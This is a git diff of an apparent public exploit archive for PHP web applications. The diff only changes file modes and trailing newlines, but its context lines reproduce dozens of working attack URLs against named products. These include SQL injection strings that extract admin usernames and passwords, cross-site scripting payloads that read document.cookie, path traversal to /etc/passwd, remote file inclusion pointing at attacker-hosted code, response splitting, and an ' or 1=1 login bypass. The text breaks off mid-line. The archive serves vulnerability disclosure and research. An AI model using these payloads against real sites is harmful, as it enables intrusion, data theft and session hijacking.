a/platforms/php/webapps/26400.txt +++ b/platforms/php/webapps/26400.txt @@ -13,4 +13,4 @@ http://www.example.com/index.php?tasks=all%22%3E%3Cscript http://www.example.com/index.php?order=sev&project=1&tasks=&type= &sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0& -sort=desc&order2=&sort2=desc \ No newline at end of file +sort=desc&order2=&sort2=desc \ No newline at end of file diff --git a/platforms/php/webapps/26405.txt b/platforms/php/webapps/26405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26406.txt b/platforms/php/webapps/26406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26408.txt b/platforms/php/webapps/26408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26414.txt b/platforms/php/webapps/26414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26416.txt b/platforms/php/webapps/26416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26423.txt b/platforms/php/webapps/26423.txt old mode 100755 new mode 100644 index 48c1e8292..b80e1ba8d --- a/platforms/php/webapps/26423.txt +++ b/platforms/php/webapps/26423.txt @@ -9,4 +9,4 @@ Versions 0.19.2 and 1.0.0rc2 are affected; an upgrade to version 0.19.3 is avail http://www.example.com/bug_sponsorship_list_view_inc.php? t_core_path=http://[host]/[file].php? http://www.example.com/bug_sponsorship_list_view_inc.php? -t_core_path=../../../../../../../[file]%00 \ No newline at end of file +t_core_path=../../../../../../../[file]%00 \ No newline at end of file diff --git a/platforms/php/webapps/26425.pl b/platforms/php/webapps/26425.pl index 77db4ba7a..3335f1bb9 100755 --- a/platforms/php/webapps/26425.pl +++ b/platforms/php/webapps/26425.pl @@ -66,5 +66,4 @@ print ("\n\n"); exit(); -# batznet-security.de && batznet.com - \ No newline at end of file +# batznet-security.de && batznet.com \ No newline at end of file diff --git a/platforms/php/webapps/26427.txt b/platforms/php/webapps/26427.txt old mode 100755 new mode 100644 index f8aacaa23..1ad82d09b --- a/platforms/php/webapps/26427.txt +++ b/platforms/php/webapps/26427.txt @@ -4,4 +4,4 @@ gCards is prone to an SQL injection vulnerability. This issue is due to a failur Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/ecards1/news.php?limit=%2527 \ No newline at end of file +http://www.example.com/ecards1/news.php?limit=%2527 \ No newline at end of file diff --git a/platforms/php/webapps/26428.html b/platforms/php/webapps/26428.html old mode 100755 new mode 100644 index 28e824f44..46e1e24a4 --- a/platforms/php/webapps/26428.html +++ b/platforms/php/webapps/26428.html @@ -9,4 +9,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> <input type=submit name=sub> <script>document.searchform.sub.click()</script> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/2643.php b/platforms/php/webapps/2643.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26431.txt b/platforms/php/webapps/26431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26432.txt b/platforms/php/webapps/26432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26433.txt b/platforms/php/webapps/26433.txt old mode 100755 new mode 100644 index 6f388b7bc..001020292 --- a/platforms/php/webapps/26433.txt +++ b/platforms/php/webapps/26433.txt @@ -6,4 +6,4 @@ These issues can allow remote attackers to execute arbitrary PHP commands and ca ATutor 1.5.1-pl1 and prior versions are affected. -http://www.example.com/documentation/common/print.php?section=[file]%00 \ No newline at end of file +http://www.example.com/documentation/common/print.php?section=[file]%00 \ No newline at end of file diff --git a/platforms/php/webapps/26434.txt b/platforms/php/webapps/26434.txt old mode 100755 new mode 100644 index 365129e6a..d9601701a --- a/platforms/php/webapps/26434.txt +++ b/platforms/php/webapps/26434.txt @@ -8,4 +8,4 @@ These issues are reported to affect PBLang version 4.65; other versions may also http://www.example.com/profile.php?u=<script>JavaScript:alert(document.cookie);</script> http://www.example.com/delpm.php?id=<script>JavaScript:alert(document.cookie);</script> -http://www.example.com/pmpshow.php?num=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/pmpshow.php?num=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/26436.txt b/platforms/php/webapps/26436.txt old mode 100755 new mode 100644 index ceac1276e..1e3b03fdf --- a/platforms/php/webapps/26436.txt +++ b/platforms/php/webapps/26436.txt @@ -4,4 +4,4 @@ MG2 is affected by an authentication bypass vulnerability. This issue can allow All versions of MG2 are considered to be vulnerable at the moment. Minigal B13 is likely affected as well. -http://www.exmaple.com/mg2/index.php?list=*&page=all \ No newline at end of file +http://www.exmaple.com/mg2/index.php?list=*&page=all \ No newline at end of file diff --git a/platforms/php/webapps/26437.txt b/platforms/php/webapps/26437.txt old mode 100755 new mode 100644 index ad0d102c2..fd6dbaef5 --- a/platforms/php/webapps/26437.txt +++ b/platforms/php/webapps/26437.txt @@ -6,4 +6,4 @@ Access to sensitive files containing authentication credentials is not restricte PHP Advanced Transfer Manager 1.30 is reported to be vulnerable. Other versions may be affected as well. -http://www.example.com/phpATM/users/<username> \ No newline at end of file +http://www.example.com/phpATM/users/<username> \ No newline at end of file diff --git a/platforms/php/webapps/26438.txt b/platforms/php/webapps/26438.txt old mode 100755 new mode 100644 index fee590d15..19bf584de --- a/platforms/php/webapps/26438.txt +++ b/platforms/php/webapps/26438.txt @@ -4,4 +4,4 @@ Invision Gallery is prone to an SQL injection vulnerability. This issue is due t Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st='[SQL] \ No newline at end of file +http://www.example.com/index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2644.php b/platforms/php/webapps/2644.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26440.txt b/platforms/php/webapps/26440.txt old mode 100755 new mode 100644 index 7ef21f20f..dfb9da879 --- a/platforms/php/webapps/26440.txt +++ b/platforms/php/webapps/26440.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id='[SQL] http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,name,name%20from%20pc_admins/* -http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,pass,name%20from%20pc_admins/* \ No newline at end of file +http://www.example.com/index.php/pg/index.php?pg=scripts&CODE=06&id=-10%20union%20select%20name,pass,name%20from%20pc_admins/* \ No newline at end of file diff --git a/platforms/php/webapps/26441.txt b/platforms/php/webapps/26441.txt old mode 100755 new mode 100644 index 3067fd899..8f2cd6ea6 --- a/platforms/php/webapps/26441.txt +++ b/platforms/php/webapps/26441.txt @@ -8,4 +8,4 @@ http://www.example.com/oaboard/forum.php?modul=topics&channel=[SQL] http://www.example.com/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1 http://www.example.com/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3 -http://www.example.com/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3 \ No newline at end of file +http://www.example.com/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3 \ No newline at end of file diff --git a/platforms/php/webapps/26442.txt b/platforms/php/webapps/26442.txt old mode 100755 new mode 100644 index 9de611bc7..e06989818 --- a/platforms/php/webapps/26442.txt +++ b/platforms/php/webapps/26442.txt @@ -4,4 +4,4 @@ PHP is prone to a cross-site scripting vulnerability. This issue is due to a fai An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/26446.txt b/platforms/php/webapps/26446.txt old mode 100755 new mode 100644 index e581e7e0a..7a2fa1fbc --- a/platforms/php/webapps/26446.txt +++ b/platforms/php/webapps/26446.txt @@ -4,4 +4,4 @@ vCard PRO is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/fcard/addrbook.php?action=edit&addr_id='[SQL] \ No newline at end of file +http://www.example.com/fcard/addrbook.php?action=edit&addr_id='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26447.html b/platforms/php/webapps/26447.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26449.txt b/platforms/php/webapps/26449.txt old mode 100755 new mode 100644 index 1fa618f93..4856845c9 --- a/platforms/php/webapps/26449.txt +++ b/platforms/php/webapps/26449.txt @@ -19,4 +19,4 @@ if (e_QUERY) { // Line 232 $sql->db_Select("advmedsys_awarded", "*", "WHERE awarded_user_id = $sub_action",""); -Example URL: http://site.com/plugins/advmedsys_view.php?profile.*SQL HERE* \ No newline at end of file +Example URL: http://site.com/plugins/advmedsys_view.php?profile.*SQL HERE* \ No newline at end of file diff --git a/platforms/php/webapps/2645.txt b/platforms/php/webapps/2645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26455.txt b/platforms/php/webapps/26455.txt old mode 100755 new mode 100644 index e66931d4d..835ed7fa9 --- a/platforms/php/webapps/26455.txt +++ b/platforms/php/webapps/26455.txt @@ -4,4 +4,4 @@ VUBB is prone to a cross-site scripting vulnerability. This issue is due to a fa An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&f=6 \ No newline at end of file +http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&f=6 \ No newline at end of file diff --git a/platforms/php/webapps/26456.txt b/platforms/php/webapps/26456.txt old mode 100755 new mode 100644 index 5ce5d7b5c..770737593 --- a/platforms/php/webapps/26456.txt +++ b/platforms/php/webapps/26456.txt @@ -4,4 +4,4 @@ XMB Nexus Forum is prone to an SQL injection vulnerability. This issue is due to Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://forums.site/post.php?action=newthread&fid='[SQL]&poll=yes \ No newline at end of file +http://forums.site/post.php?action=newthread&fid='[SQL]&poll=yes \ No newline at end of file diff --git a/platforms/php/webapps/26458.txt b/platforms/php/webapps/26458.txt old mode 100755 new mode 100644 index 5bcb29e58..e964b8ed3 --- a/platforms/php/webapps/26458.txt +++ b/platforms/php/webapps/26458.txt @@ -4,4 +4,4 @@ News2Net is prone to an SQL injection vulnerability. This issue is due to a fail Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/news2net/index.php?category=[SQL] \ No newline at end of file +http://www.example.com/news2net/index.php?category=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26459.txt b/platforms/php/webapps/26459.txt old mode 100755 new mode 100644 index 6ba6d8c6e..85cff39bc --- a/platforms/php/webapps/26459.txt +++ b/platforms/php/webapps/26459.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th phpWebThings version 1.4.4 is affected; other versions may also be vulnerable. -http://www.example.com/forum.php?forum='><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/forum.php?forum='><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2646.txt b/platforms/php/webapps/2646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26465.txt b/platforms/php/webapps/26465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26466.txt b/platforms/php/webapps/26466.txt old mode 100755 new mode 100644 index c43bd2d52..87929df11 --- a/platforms/php/webapps/26466.txt +++ b/platforms/php/webapps/26466.txt @@ -11,4 +11,4 @@ An attacker may also upload arbitrary scripts, which may be subsequently execute CuteNews 1.4.1 is reported to be vulnerable to this issue. Other versions may be affected as well. http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00 -http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script] \ No newline at end of file +http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script] \ No newline at end of file diff --git a/platforms/php/webapps/26467.txt b/platforms/php/webapps/26467.txt old mode 100755 new mode 100644 index ceb2098fd..75e617f33 --- a/platforms/php/webapps/26467.txt +++ b/platforms/php/webapps/26467.txt @@ -4,4 +4,4 @@ PHP Handicapper is vulnerable to an HTTP response splitting vulnerability. This A remote attacker may exploit this vulnerability to influence or misrepresent how Web content is served, cached or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust. -http://www.example.com/front/process_signup.php?login=[CRLF] \ No newline at end of file +http://www.example.com/front/process_signup.php?login=[CRLF] \ No newline at end of file diff --git a/platforms/php/webapps/26469.txt b/platforms/php/webapps/26469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2647.php b/platforms/php/webapps/2647.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26470.txt b/platforms/php/webapps/26470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26474.txt b/platforms/php/webapps/26474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26476.txt b/platforms/php/webapps/26476.txt old mode 100755 new mode 100644 index 314618f7f..ae66df2a4 --- a/platforms/php/webapps/26476.txt +++ b/platforms/php/webapps/26476.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to execute arbitrary remote PHP code on an af http://www.example.com/index.php?page=http://evilcode?&cmd= -or http://www.example.com//?site=evilcode?&cmd= \ No newline at end of file +or http://www.example.com//?site=evilcode?&cmd= \ No newline at end of file diff --git a/platforms/php/webapps/26477.txt b/platforms/php/webapps/26477.txt old mode 100755 new mode 100644 index edaa92612..a18b275ef --- a/platforms/php/webapps/26477.txt +++ b/platforms/php/webapps/26477.txt @@ -4,4 +4,4 @@ XMB is prone to a cross-site scripting vulnerability because the application fai An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. A successful exploit could allow an attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/u2u.php?action=send&username=[code] \ No newline at end of file +http://www.example.com/u2u.php?action=send&username=[code] \ No newline at end of file diff --git a/platforms/php/webapps/26478.txt b/platforms/php/webapps/26478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2648.txt b/platforms/php/webapps/2648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26480.txt b/platforms/php/webapps/26480.txt old mode 100755 new mode 100644 index 7917b2c71..d9136b308 --- a/platforms/php/webapps/26480.txt +++ b/platforms/php/webapps/26480.txt @@ -7,4 +7,4 @@ A remote attacker may exploit this vulnerability to reveal files that contain po Version 2.1 is vulnerable; earlier versions may also be vulnerable. http://www.example.com/engine/admin/admin.php?id_user= -../../../../../../etc/passwd \ No newline at end of file +../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/26481.txt b/platforms/php/webapps/26481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26482.txt b/platforms/php/webapps/26482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26483.txt b/platforms/php/webapps/26483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26484.txt b/platforms/php/webapps/26484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26485.txt b/platforms/php/webapps/26485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26486.txt b/platforms/php/webapps/26486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26487.txt b/platforms/php/webapps/26487.txt old mode 100755 new mode 100644 index b241fac6d..7207a55a9 --- a/platforms/php/webapps/26487.txt +++ b/platforms/php/webapps/26487.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code executed in This issue only affects the BSP runtime of SAP WAS. -http://www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap-sessioncmd=open&sap-syscmd=%3Cscript%3Ealert('xss')%3C/script%3E \ No newline at end of file +http://www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap-sessioncmd=open&sap-syscmd=%3Cscript%3Ealert('xss')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26488.txt b/platforms/php/webapps/26488.txt old mode 100755 new mode 100644 index 8c3ec03cd..43dc06de4 --- a/platforms/php/webapps/26488.txt +++ b/platforms/php/webapps/26488.txt @@ -8,4 +8,4 @@ A successful attack may result in various attacks including theft of cookie-base This issue only affects the BSP runtime of SAP WAS. -http://www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=http%3a%2f%2fwww.example.com \ No newline at end of file +http://www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=http%3a%2f%2fwww.example.com \ No newline at end of file diff --git a/platforms/php/webapps/26490.txt b/platforms/php/webapps/26490.txt old mode 100755 new mode 100644 index 3c0a40e25..e18b3c19f --- a/platforms/php/webapps/26490.txt +++ b/platforms/php/webapps/26490.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Versions 1.9.x up to and including 1.9.2 are affected; prior versions may also be affected. http://www.example.com/tiki-view_forum_thread.php?forumId=1&comments_parentId=0&topics_offset=10%22%20onmouseover='javascript:alert(document.title)%3B'%3E[PLEASE%20MO -VE%20YOUR%20MOUSE%20POINTER%20HERE!]%20%3Cx%20y=%22 \ No newline at end of file +VE%20YOUR%20MOUSE%20POINTER%20HERE!]%20%3Cx%20y=%22 \ No newline at end of file diff --git a/platforms/php/webapps/26499.txt b/platforms/php/webapps/26499.txt old mode 100755 new mode 100644 index 27d2e60bb..ebb9a745c --- a/platforms/php/webapps/26499.txt +++ b/platforms/php/webapps/26499.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00 http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00 http://www.example.com//index.php?sensor_program=lmsensors.inc.php/../../README%00 -http://www.example.com/index.php?charset=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked!</html> \ No newline at end of file +http://www.example.com/index.php?charset=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked!</html> \ No newline at end of file diff --git a/platforms/php/webapps/26500.txt b/platforms/php/webapps/26500.txt old mode 100755 new mode 100644 index 63a244068..b1a7797bd --- a/platforms/php/webapps/26500.txt +++ b/platforms/php/webapps/26500.txt @@ -4,4 +4,4 @@ phpWebThings is prone to an SQL injection vulnerability. This is an input valida It is likely that the issue could compromise the software. Depending on the database implementation and the nature of the affected query, it may also be possible to gain unauthorized access to the database. -http://www.example.com/download.php?file=|SQL \ No newline at end of file +http://www.example.com/download.php?file=|SQL \ No newline at end of file diff --git a/platforms/php/webapps/26501.txt b/platforms/php/webapps/26501.txt old mode 100755 new mode 100644 index 8665a3f4d..47f6fdab7 --- a/platforms/php/webapps/26501.txt +++ b/platforms/php/webapps/26501.txt @@ -7,4 +7,4 @@ Successful attacks could compromise the software. Depending on the database impl http://www.example.com/[12allTarget]/admin/index.php Username: ' or 1=1 /* -Password: (Nothing)(Blank) \ No newline at end of file +Password: (Nothing)(Blank) \ No newline at end of file diff --git a/platforms/php/webapps/26502.txt b/platforms/php/webapps/26502.txt old mode 100755 new mode 100644 index 6f2a9361f..e0959a95f --- a/platforms/php/webapps/26502.txt +++ b/platforms/php/webapps/26502.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to disclose sensitive information. This may It should be noted that this issue may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server. -http://www.example.com/support/module.php?module=osTicket&file=/../../../../../etc/passwd \ No newline at end of file +http://www.example.com/support/module.php?module=osTicket&file=/../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/26503.txt b/platforms/php/webapps/26503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26504.txt b/platforms/php/webapps/26504.txt old mode 100755 new mode 100644 index ebae6cbbd..5e9bc678d --- a/platforms/php/webapps/26504.txt +++ b/platforms/php/webapps/26504.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,userid,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 -http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 \ No newline at end of file +http://www.example.com/ForumReply.php?TopicID=-10%20union%20select%201,password,3,4,5,6,7%20from%20ForumUser%20where%20user_index=1 \ No newline at end of file diff --git a/platforms/php/webapps/26505.txt b/platforms/php/webapps/26505.txt old mode 100755 new mode 100644 index 49082e89d..672e0ba22 --- a/platforms/php/webapps/26505.txt +++ b/platforms/php/webapps/26505.txt @@ -4,4 +4,4 @@ Unspecified Codegrrl applications are prone to a remote arbitrary code execution An attacker can exploit this to execute arbitrary code in the context of the Web server process. This may facilitate a compromise of the system; other attacks are also possible. -http://www.example.com/protection.php?action=logout&siteurl=http://www.example.com/malicoius-code.txt \ No newline at end of file +http://www.example.com/protection.php?action=logout&siteurl=http://www.example.com/malicoius-code.txt \ No newline at end of file diff --git a/platforms/php/webapps/26510.txt b/platforms/php/webapps/26510.txt old mode 100755 new mode 100644 index a1753b0b9..16fa75de8 --- a/platforms/php/webapps/26510.txt +++ b/platforms/php/webapps/26510.txt @@ -4,4 +4,4 @@ Pearl Forums is prone to multiple SQL injection vulnerabilities. These issues ar Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/support/index.php?mode=forums&forumId=[sql] \ No newline at end of file +http://www.example.com/support/index.php?mode=forums&forumId=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26511.txt b/platforms/php/webapps/26511.txt old mode 100755 new mode 100644 index c087fcca4..3bc930174 --- a/platforms/php/webapps/26511.txt +++ b/platforms/php/webapps/26511.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to disclose sensitive information. This may It should be noted that this issue may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server. -http://www.example.com/support/index.php?mode=../../index \ No newline at end of file +http://www.example.com/support/index.php?mode=../../index \ No newline at end of file diff --git a/platforms/php/webapps/26512.txt b/platforms/php/webapps/26512.txt old mode 100755 new mode 100644 index c6ecfa5b4..9ff08d390 --- a/platforms/php/webapps/26512.txt +++ b/platforms/php/webapps/26512.txt @@ -4,4 +4,4 @@ phpWCMS is prone to multiple remote file-include vulnerabilities because the app An attacker may leverage these issues to obtain sensitive information that may help with further attacks on the affected computer. -http://www.example.com/phpwcms/login.php?form_lang=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/phpwcms/login.php?form_lang=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/26513.txt b/platforms/php/webapps/26513.txt old mode 100755 new mode 100644 index d2519e260..e49fba458 --- a/platforms/php/webapps/26513.txt +++ b/platforms/php/webapps/26513.txt @@ -4,4 +4,4 @@ phpWCMS is prone to multiple remote file-include vulnerabilities because the app An attacker may leverage these issues to obtain sensitive information that may help with further attacks on the affected computer. -http://www.example.com/phpwcms/img/random_image.php?imgdir=../../../etc/ \ No newline at end of file +http://www.example.com/phpwcms/img/random_image.php?imgdir=../../../etc/ \ No newline at end of file diff --git a/platforms/php/webapps/26514.txt b/platforms/php/webapps/26514.txt old mode 100755 new mode 100644 index 3f97f97ae..0b99c7b02 --- a/platforms/php/webapps/26514.txt +++ b/platforms/php/webapps/26514.txt @@ -5,4 +5,4 @@ phpwcms is prone to multiple cross-site scripting vulnerabilities. These issues An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/phpwcms/include/inc_act/act_newsletter.php?i=V:target@example.com:<script>alert(document.cookie)</script>) -http://www.example.com/phpwcms/include/inc_act/act_newsletter.php?text=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/phpwcms/include/inc_act/act_newsletter.php?text=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26515.txt b/platforms/php/webapps/26515.txt old mode 100755 new mode 100644 index 3771487de..d774c97cc --- a/platforms/php/webapps/26515.txt +++ b/platforms/php/webapps/26515.txt @@ -4,4 +4,4 @@ Template Seller Pro is prone to a remote file include vulnerability. This issue An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://www.example.com/[CODE]? \ No newline at end of file +http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://www.example.com/[CODE]? \ No newline at end of file diff --git a/platforms/php/webapps/26516.txt b/platforms/php/webapps/26516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2652.htm b/platforms/php/webapps/2652.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26521.txt b/platforms/php/webapps/26521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2653.txt b/platforms/php/webapps/2653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26530.txt b/platforms/php/webapps/26530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26535.txt b/platforms/php/webapps/26535.txt old mode 100755 new mode 100644 index 418f7e8a5..79135f8d6 --- a/platforms/php/webapps/26535.txt +++ b/platforms/php/webapps/26535.txt @@ -4,4 +4,4 @@ LiteSpeed Web Server is prone to a cross-site scripting vulnerability. This issu An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com:7080/admin/config/confMgr.php?m=al_adminListener%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com:7080/admin/config/confMgr.php?m=al_adminListener%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26538.txt b/platforms/php/webapps/26538.txt old mode 100755 new mode 100644 index e4cc82533..c42a77cd2 --- a/platforms/php/webapps/26538.txt +++ b/platforms/php/webapps/26538.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos /forum/viewforum.php?forum_id=4&lastvisited='[SQL injection] -http://www.example.com/forum/viewforum.php?forum_id=1&lastvisited=' \ No newline at end of file +http://www.example.com/forum/viewforum.php?forum_id=1&lastvisited=' \ No newline at end of file diff --git a/platforms/php/webapps/26539.txt b/platforms/php/webapps/26539.txt old mode 100755 new mode 100644 index ccdc8ecb7..473c81034 --- a/platforms/php/webapps/26539.txt +++ b/platforms/php/webapps/26539.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary code in the browser of http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");</script> -http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/2654.txt b/platforms/php/webapps/2654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26541.txt b/platforms/php/webapps/26541.txt old mode 100755 new mode 100644 index 791ebdeb5..766987e06 --- a/platforms/php/webapps/26541.txt +++ b/platforms/php/webapps/26541.txt @@ -4,4 +4,4 @@ SimplePoll is prone to an SQL injection vulnerability. This issue is due to a fa Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/SimplePoll/results.php?pollid=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3/* \ No newline at end of file +http://www.example.com/SimplePoll/results.php?pollid=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3/* \ No newline at end of file diff --git a/platforms/php/webapps/26543.txt b/platforms/php/webapps/26543.txt old mode 100755 new mode 100644 index 3eba0b9e2..083043289 --- a/platforms/php/webapps/26543.txt +++ b/platforms/php/webapps/26543.txt @@ -4,4 +4,4 @@ APBoard is prone to an SQL injection vulnerability. This is due to a lack of pro Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/apboard/thread.php?id=210&start=[SQL] \ No newline at end of file +http://www.example.com/apboard/thread.php?id=210&start=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26544.txt b/platforms/php/webapps/26544.txt old mode 100755 new mode 100644 index 8d832e879..b845c830d --- a/platforms/php/webapps/26544.txt +++ b/platforms/php/webapps/26544.txt @@ -4,4 +4,4 @@ PHP Download Manager is prone to 